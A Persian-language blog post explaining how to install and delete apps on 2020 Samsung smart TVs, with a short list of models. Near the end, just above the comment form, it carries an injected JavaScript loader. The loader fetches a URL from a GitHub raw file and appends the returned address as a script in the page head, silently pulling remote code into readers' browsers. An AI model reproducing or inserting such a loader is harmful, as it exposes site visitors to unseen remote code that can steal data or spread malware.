دسته‌بندی نشده

نحو اضافه و حذف کردن اپلیکیشن در تلویزیون های 2020 سامسونگ

برای استفاده از کاربرد های مختلفی که تلویزیون های هوشمند سامسونگ دارند نیاز است که اپلیکیشن های مختلف را به ان اضافه و برای ان دانلود کنید. اپلیکیشن های تلویزیون سامسونگ به اسانی پیدا می شوند و همچنین نصب ان ها بسیار ساده می باشد. پلتفرم این برند تعداد بسیار زیادی اپلیکیشن ها مانند بازی، ویدیو و اخبار را ارائه می دهد. برخی از این اپلیکیشن ها شامل نتفلیکس، امازون، Prime Video و Hulu می باشند که پر کاربرد ترین ان ها نیز محسوب می شوند. همانطور که پیدا کردن برنامه ها بسیار اسان هستند حذف ان ها از تلویزیون نیز فوق العاده اسان می باشد. در این مطلب علاوه بر اموزش نحو نصب و راه اندازی برنامه و اپلیکیشن ها شیوه حذف ان ها از تلویزیون را نیز بیان خواهیم کرد.

نحو نصب اپلیکیشن

۱: به منو اپلیکیشن ها مراجعه کنید
بر روی دکمه Home , هوم کلیک کنید و به قسمت چپ مراجعه کنید تا زمانی که اپلیکیشن ها را مشاهده می کنید. دکمه انتخاب را بزنید و ادامه دهید.

۲: به فروشگاه محتویات مراجعه کنید
فروشگاه محتویات سامسونگ تعداد بسیار زیادی از اپلیکیشن ها را ارائه می دهد. در این قسمت کاربران می توانند به اسانی در میان صفحات مختلف اپلیکیشن های مورد نیاز خود را انتخاب کنند.

۳: یا می توانید اپلیکیشن ها را بر اساس نام جستجو کنید
پیدا کردن اپلیکیشن در تلویزیون سامسونگ فوق العاده اسان می باشد. قسمت سرچ برنامه ها در سمت بالا قسمت راست از صفحه وجود دارد در این قسمت می توانید به سادگی با استفاده از کیبورد و یا به وسیله میکروفون توکار و با استفاده از صدا اپلیکیشن ها را جستجو کنید. زمانی که کلمات را تایپ می کنید برنامه های مختلف بر اساس حدث برایتان نمایش داده می شود.

۴: برنامه را نصب کنید
شروع به دانلود در تلویزیون سامسونگ بسیار اسان است و تنها با یک کلیک بر روی دکمه انجام می شود. برنامه را انتخاب کنید و دکمه شروع را بزنید تا دانلود اپلیکیشن شروع شود.

۵: برنامه را به صفحه اضافه کنید و ان را باز کنید
پس از اتمام دانلود کاربران می توانند بلافاصله ان را باز کنند و یا ان را به صفحه اسمارت هاب اضافه کنند و ان را اجرا کنند.

نحو حذف کردن اپلیکیشن ها

حذف کردن اپلیکیشن ها بر روی تلویزیون سامسونگ بسیار اسان می باشد. در ادامه نحو حذف اپلیکیشن ها را به صورت مرحله ای بیان خواهیم کرد.

۱: تنظیمات را در اپلیکیشن ها باز کنید
بر روی ایکون چرخ دنده در قسمت بالا سمت راست صفحه(کنار قسمت سرچ) کلیک کنید.

۲: اپلیکیشنی که می خواهید حذف کنید را انتخاب کنید
اپلیکیشن هایی را که می خواهید می توانید به اسانی و تنها با کلیک بر روی Delete حذف کنید. اپلیکیشن هایی مانند امازون، نتفلیکیس و برنامه هایی که از پیش نصب شده بر روی تلویزیون می باشند قابل حذف نیستند.

۳: تایید کنید که می خواهید برنامه را حذف کنید
و تمام، برنامه مورد نظر حذف خواهد شد.

تلویزیون های 2020 سامسونگ

TU8000

Q60T

Q80T

Q70T

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *